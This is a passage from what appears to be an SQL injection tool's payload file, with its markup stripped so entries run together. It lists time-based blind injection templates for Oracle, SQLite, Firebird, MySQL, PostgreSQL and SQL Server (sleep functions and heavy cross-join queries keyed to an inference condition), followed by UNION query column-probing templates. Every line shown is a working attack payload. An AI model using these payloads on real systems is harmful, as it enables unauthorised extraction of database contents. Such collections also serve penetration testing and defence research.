[RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]', [SLEEPTIME])--OracleOracle AND time-based blind (heavy query)5221,2,31AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1, ALL_USERS T2, ALL_USERS T3, ALL_USERS T4, ALL_USERS T5) ELSE [RANDNUM] END)AND [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1, ALL_USERS T2, ALL_USERS T3, ALL_USERS T4, ALL_USERS T5)OracleOracle AND time-based blind (heavy query - comment)5521,2,31AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1, ALL_USERS T2, ALL_USERS T3, ALL_USERS T4, ALL_USERS T5) ELSE [RANDNUM] END)AND [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1, ALL_USERS T2, ALL_USERS T3, ALL_USERS T4, ALL_USERS T5)--OracleSQLite > 2.0 AND time-based blind (heavy query)53211AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000))))) ELSE [RANDNUM] END)AND [RANDNUM]=LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000))))SQLite> 2.0SQLite > 2.0 AND time-based blind (heavy query - comment)55211AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000))))) ELSE [RANDNUM] END)AND [RANDNUM]=LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000))))--SQLite> 2.0Firebird AND time-based blind (heavy query)54211AND [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1, RDB$TYPES AS T2, RDB$COLLATIONS AS T3),[RANDNUM])AND [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1, RDB$TYPES AS T2, RDB$COLLATIONS AS T3)Firebird>= 2.0Firebird AND time-based blind (heavy query - comment)55211AND [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1, RDB$TYPES AS T2, RDB$COLLATIONS AS T3),[RANDNUM])AND [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1, RDB$TYPES AS T2, RDB$COLLATIONS AS T3)--Firebird>= 2.0MySQL > 5.0.11 OR time-based blind5231,2,32OR [RANDNUM]=IF(([INFERENCE]), SLEEP([SLEEPTIME]), [RANDNUM])OR [RANDNUM]=SLEEP([SLEEPTIME])MySQL> 5.0.11MySQL < 5.0.12 OR time-based blind (heavy query)5431,2,32OR [RANDNUM]=IF(([INFERENCE]), BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]')), [RANDNUM])OR [RANDNUM]=BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]'))MySQLPostgreSQL > 8.1 OR time-based blind5331,2,32OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)OR [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))PostgreSQL> 8.1PostgreSQL OR time-based blind (heavy query)5431,2,32OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1, [SLEEPTIME]000000)) ELSE [RANDNUM] END)OR [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1, [SLEEPTIME]000000))PostgreSQLMicrosoft SQL Server/Sybase OR time-based blind (heavy query)5331,2,32OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7) ELSE [RANDNUM] END)OR [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7)Microsoft SQL ServerWindowsOracle OR time-based blind5331,2,32OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)OR [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])OracleOracle OR time-based blind (heavy query)5431,2,32OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1, ALL_USERS T2, ALL_USERS T3, ALL_USERS T4, ALL_USERS T5) ELSE [RANDNUM] END)OR [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1, ALL_USERS T2, ALL_USERS T3, ALL_USERS T4, ALL_USERS T5)OracleSQLite > 2.0 OR time-based blind (heavy query)54312OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000))))) ELSE [RANDNUM] END)OR [RANDNUM]=LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000))))SQLite> 2.0Firebird OR time-based blind (heavy query)55312OR [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1, RDB$TYPES AS T2, RDB$COLLATIONS AS T3),[RANDNUM])OR [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1, RDB$TYPES AS T2, RDB$COLLATIONS AS T3)Firebird>= 2.0MySQL UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns3111,2,3,4,51[UNION]#NULL[COLSTART]-[COLSTOP]MySQLMySQL UNION query ([CHAR]) - 1 to 3 columns3111,2,3,4,51[UNION]#NULL1-3MySQLMySQL UNION query ([CHAR]) - 4 to 7 columns3211,2,3,4,51[UNION]#NULL4-7MySQLMySQL UNION query ([CHAR]) - 8 to 12 columns3311,2,3,4,51[UNION]#NULL8-12MySQLMySQL UNION query ([CHAR]) - 13 to 18 columns3411,2,3,4,51[UNION]#NULL13-18MySQLMySQL UNION query ([CHAR]) - 19 to 25 columns3511,2,3,4,51[UNION]#NULL19-25MySQLGeneric UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns3111,2,3,4,51[UNION]--NULL[COLSTART]-[COLSTOP]Generic UNION query ([CHAR]) - 1 to 3 columns3111,2,3,4,51[UNION]--NULL1-3Generic UNION query ([CHAR]) - 4 to 7 columns3211,2,3,4,51[UNION]--NULL4-7Generic UNION query ([CHAR]) - 8 to 12 columns3311,2,3,4,51[UNION]--NULL8-12Generic UNION query ([CHAR]) - 13 to 18 columns3411,2,3,4,51[UNION]--NULL13-18Generic UNION query ([CHAR]) - 19 to 25 columns3511,2,3,4,51[UNION]--NULL19-25